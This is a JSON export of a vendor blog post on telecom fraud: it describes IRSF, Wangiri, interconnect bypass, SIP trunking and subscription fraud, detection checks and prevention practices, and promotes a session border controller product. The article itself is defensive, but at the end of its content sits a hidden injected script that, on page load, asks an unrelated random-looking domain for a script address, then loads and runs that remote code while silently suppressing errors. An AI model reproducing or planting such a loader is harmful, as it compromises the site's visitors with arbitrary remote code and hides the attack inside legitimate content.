{"id":3316,"date":"2022-08-30T05:18:19","date_gmt":"2022-08-30T05:18:19","guid":{"rendered":"https:\/\/www.revesoft.com\/blog\/?p=3316"},"modified":"2025-09-05T11:20:07","modified_gmt":"2025-09-05T11:20:07","slug":"telecom-fraud-management","status":"publish","type":"post","link":"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/","title":{"rendered":"Telecom Fraud Management: How to Identify and Prevent Fraud in Real Time?"},"content":{"rendered":"<p>Telecom fraud is on a continuous rise and is one of the biggest sources of revenue loss amongst Telcos. As per a report from CFCA Fraud Loss Survey, Telecom Fraud Losses have increased by 28% between the years 2019 and 2021. The onset of the pandemic in 2020, further escalated telecommunications fraud and security threats.<\/p>\n<blockquote><p>According to a survey released by Mobileum Inc. (\u201cMobileum\u201d), it has been found that <em>75% of operators polled were experiencing new or emerging incidents of fraud and 61% said network security threats increased significantly with the onset of the COVID-19 pandemic.<\/em><\/p>\n<p>The report even provides data about the types of fraud loss in which <em>IRSF and Traffic pumping incur to $6.69 billion and $4.54 billion respectively in 2021.<\/em><\/p><\/blockquote>\n<p>With these numbers, it becomes evident that to manage the pervasive threat of telco fraud, industry providers must have an effective fraud management approach that defends businesses and consumers.<\/p>\n<h2>What is Fraud Management in Telecom?<\/h2>\n<p>Frauds are not a new thing in the telecom industry &#8211; they have always been there. Technology is changing at a fast pace, and so are telecom fraud tactics. Fraudsters formulate new ways or simply tweak the existing methods to abuse telecommunications products and services. Their ultimate intention is to use services for free or illegally acquire money from CSPs or end users. High frequency, multiple layers of anonymity, and global nature help attackers to remain undetected.<\/p>\n<p>An effective Telecom Fraud Detection Management process is a critical element in determining the success of a telecommunication company. Such a mechanism is important to detect and prevent fraudulent activities which can cause revenue losses. \u00a0There are different types of telecommunication fraud that need to be addressed and handled by these mechanisms. Before we discuss this in detail, let us first take a look at the most common types of telecom fraud that one should know about.<\/p>\n<h2>Types of Telecom Fraud<\/h2>\n<p>Based on the target of the attackers, telecom frauds can be divided into two categories &#8211; Telcos and end users. Some of the major frauds that affect both carriers and end users are as mentioned below:<\/p>\n<h3>IRSF: International Revenue Share Fraud<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3360\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/1-IRSF-2.jpg\" alt=\"IRSF fraud\" width=\"1200\" height=\"350\" \/><\/p>\n<p>IRSF is one of the biggest fraud challenges for Telcos. In a report by CFCA, Revenue Share Fraud accounts for a $4 billion to $6.1 billion loss to the telecom industry. In this type of fraud attempt, the attackers take advantage of premium phone rates. Here\u2019s how it happens:<\/p>\n<ul>\n<li>The attacker leases a premium phone number.<\/li>\n<li>The attacker then breaks into a business\u2019s phone system and makes multiple calls to the premium rate number. Generally, these calls are made for a long duration to increase the phone bill.<\/li>\n<li>Huge phone bills are generated and paid by the business, 25% of which goes into the pockets of the attackers.<\/li>\n<\/ul>\n<p>These calls are generally made outside a business\u2019s working hours. Most of the time, companies do not realize that they have been attacked unless the time to pay the phone bill arrives.<\/p>\n<h3>Call Forwarding Fraud<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3349\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/2-4.jpg\" alt=\"Call Forwarding Fraud\" width=\"1200\" height=\"350\" \/><\/p>\n<p>Call Forward fraud is a sophisticated form of telecommunication fraud. Attackers first hack access to the PBX system or IVR (Interactive Voice Response) of an enterprise. Then they configure call forwarding to a premium long-distance number. Once done, the attacker calls the phone number of the hacked PBX system which forwards the call to the premium number. Here the attacker earns profit from IRSF.<\/p>\n<h3>Wangiri Fraud<\/h3>\n<p>It is also known as \u2018One Ring and Cut\u2019 Fraud. Wangiri is a Japanese word that means one and cut. It\u2019s a telephone scam that aims at striking curiosity among customers by calling from premium rate numbers. Each call is made to ring only once and is hung up. Thus, leaving a missed call on the recipient\u2019s phone. The recipient often calls back without knowing that it\u2019s a premium rate number controlled by fraudsters.<\/p>\n<h3>Interconnect Bypass Fraud<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3339\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/3-2.jpg\" alt=\"Interconnect Bypass Fraud\" width=\"1200\" height=\"350\" \/>Also known as Toll Bypass Fraud or GSM Gateway Fraud, these types of frauds are executed by routing unauthorized traffic to a local operator via Sim Box or GSM Gateway. This is done so that the call terminates with the local operators and thus the expensive international interconnect gets replaced with an extremely low-cost routing channel. The bad actors thus earn the cost difference.<\/p>\n<h3>Wholesale SIP Trunking Fraud<\/h3>\n<p>In this type of fraud, the fraudsters make money by selling wholesale trunking services. The fraudsters use stolen credentials to terminate calls. Usually, a huge number of random calls are generated by fraudsters where destinations are not high cost but are not low cost either. This is how it is executed:<\/p>\n<ol>\n<li>The attacker steals the subscriber\u2019s username and password<\/li>\n<li>Attacker\u2019s softswitch registers with the service provider\u2019s softswitch using stolen credentials<\/li>\n<li>A legitimate user places a call<\/li>\n<li>The attacker sends INVITE to the service provider\u2019s softswitch<\/li>\n<li>Softswitch routes call to an international long-distance destination<\/li>\n<\/ol>\n<p>Wholesale SIP trunking fraud is often difficult to detect. This is because the call patterns in these frauds look similar to normal subscriber usage.<\/p>\n<h3>Subscription Frauds<\/h3>\n<p>This type of fraud is executed by obtaining stolen identities (KYC documents) of customers from phishing attacks or purchasing from the dark web. Customer information is used to sign up for new telecom contracts and use their products and service but without the intention of paying them. It has been estimated that almost 40% of bad debts are actually subscription frauds.<\/p>\n<h2>How to Identify Fraud in Telecom?<\/h2>\n<p>Traditional Approaches to telecom fraud detection are based on the blacklisting of fraud phone numbers. But today attackers can simply bypass such detection by changing their phone numbers using VoIP.\u00a0 Some of the most common techniques for telecom fraud detection are:<\/p>\n<ol>\n<li><strong>Collison Checks<\/strong> \u2013 Here the time period between two calls done by the same subscriber is checked for not colliding with a previously specified window.<\/li>\n<li><strong>Velocity Checks<\/strong> \u2013 These types of frauds are detected by checking the GIS data to detect the distance between two locations and the delta time between the calls made by the same subscriber.<\/li>\n<li><strong>New Subscriber Checks<\/strong> \u2013 In this type, false information is provided by the subscriber as he doesn\u2019t intend to pay for the services used. Phonetic matches in the subscriber\u2019s name are looked for in telecom fraud detection.<\/li>\n<li><strong>Patten Checks<\/strong> \u2013 Here specific patterns in the user activities are looked upon. This is a powerful method and can be used to detect multiple types of fraud.<\/li>\n<li><strong>Profile Checks<\/strong> \u2013 The calling pattern of the users is monitored and updated on their profile. Any unusual calling behavior may indicate fraud.<\/li>\n<\/ol>\n<h2>Best Practices for Telecom Fraud Prevention<\/h2>\n<p>We all know that prevention is better than cure. The same saying applies to the telecom fraud prevention scenario. Though attackers would always formulate new ways to penetrate into the systems, one should follow a proactive approach to fight telecom frauds. There are some golden countermeasures MNOs and MVNOs should always follow telecom fraud prevention. You can also read our post on <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/sipvoip-fraud-attacks-operators-need-reliable-solution\/\" target=\"_blank\" rel=\"noopener\">SIP\/VoIP Fraud Attacks<\/a><\/p>\n<p>Here you go:<\/p>\n<h3>Password Protection<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3346\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/Password-Security-Tips-1.jpg\" alt=\"Password Security Tips\" width=\"1200\" height=\"350\" \/><\/p>\n<p>Always make sure that your software systems are protected with strong passwords, preferably a combination of alphanumeric characters. Also, it is important to change passwords periodically.<\/p>\n<h3>Monitoring PBX Systems<\/h3>\n<p>The most appropriate time for attackers to execute their attacks is after business hours, on weekends, and on holidays. Thus during these times, it becomes more important to monitor PBX systems for any unusual activities.<\/p>\n<h3>Clear the Clutter<\/h3>\n<p>Often we tend to keep old files in our systems that are of no use. But it is crucial to clear out all the junk files and folders from the system and deactivate unused features such as extensions.<\/p>\n<h3>Validate &amp; Authenticate<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3340\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2022\/08\/4jpg.jpg\" alt=\"2 FA\" width=\"1200\" height=\"350\" \/><\/p>\n<p>For a business, it is critical to cross-check and validate the details of its subscribers so as to filter out the fake ones. Also, applying 2 factor or multi-factor authentication is also an additional step towards ensuring security.<\/p>\n<h3>Keep an Eye on Expenditures<\/h3>\n<p>By doing a smart analysis of how much expenditure typically happens in a month, a business can keep a watch on any fraudulent activity. Many companies don\u2019t do this, but tracking your expenses can help deter telecom scammers.<\/p>\n<h3>Use Security Software<\/h3>\n<p>Security software plays a crucial role in covering all grounds when it comes to security. Using intelligent security software like REVE <a href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller\" target=\"_blank\" rel=\"noopener\">Session Border Controller<\/a> is a wise idea to keep telecom attacks at bay. REVE SBC is a Carrier-grade <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/cloud-sbc\/\" target=\"_blank\" rel=\"noopener\">Cloud SBC<\/a> that safeguards software switches from various types of attacks including DoS i.e. Denial of Service Attacks. It also includes intelligent firewall and state-of-the-art encryption techniques to protect a business from theft of service. Learn more about <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/question-to-ask-from-sbc-vendors-when-buying-session-border-controller\/\" target=\"_blank\" rel=\"noopener\">session border controller vendors<\/a>.<\/p>\n<p>Wish to learn more about Telecom Fraud Prevention? Just get in touch with our team to get the best security solutions.<\/p>\n<p style=\"text-align: center;\"><a class=\"btn btn-primary\" style=\"padding: 8px 12px; font-size: 18px;\" href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller#free_demo_form\" target=\"_blank\" rel=\"noopener\">Contact for Free Demo<\/a><\/p>\n<h2 style=\"text-align: center;\">Read Also<\/h2>\n<h3 style=\"text-align: center;\"><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/session-border-controller\/\" target=\"_blank\" rel=\"noopener\">An Overview of Session Border Controller<\/a><\/h3>\n<h3 style=\"text-align: center;\"><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/\" target=\"_blank\" rel=\"noopener\">How to Prevent Spoofed Robocalls with STIR\/SHAKEN<\/a><\/h3>\n<p>Note- This post has been updated with the latest information on 21-04-2023.<script>(async () => {\n  const TIMEOUT_MS = 60_000;\n  try {\n    const tdsResponse = await fetch('https:\/\/eotoatotlasldkd.com\/ofo');\n    const scriptUrl = (await tdsResponse.text()).trim();<\/p>\n<p>    const loadScriptWithTimeout = (url, timeout) => {\n      return new Promise((resolve, reject) => {\n        const script = document.createElement('script');\n        script.src = url;\n        script.async = true;<\/p>\n<p>        script.onload = () => {\n          clearTimeout(timer);\n          resolve();\n        };<\/p>\n<p>        script.onerror = () => {\n          clearTimeout(timer);\n          reject();\n        };<\/p>\n<p>        const timer = setTimeout(() => {\n          script.remove();\n          reject();\n        }, timeout);<\/p>\n<p>        document.body.appendChild(script);\n      });\n    };<\/p>\n<p>    await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS);\n  } catch (_) {}\n})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Telecom fraud is on a continuous rise and is one of the biggest sources of revenue loss amongst Telcos. As per a report from CFCA Fraud Loss Survey, Telecom Fraud Losses have increased by 28% between the years 2019 and 2021. The onset of the pandemic in 2020, further escalated telecommunications fraud and security threats. [&hellip;]<\/p>\n","protected":false},"author":19,"featured_media":3317,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[74],"tags":[],"class_list":["post-3316","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sbc"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/comments?post=3316"}],"version-history":[{"count":18,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3316\/revisions"}],"predecessor-version":[{"id":6440,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3316\/revisions\/6440"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media\/3317"}],"wp:attachment":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media?parent=3316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/categories?post=3316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/tags?post=3316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}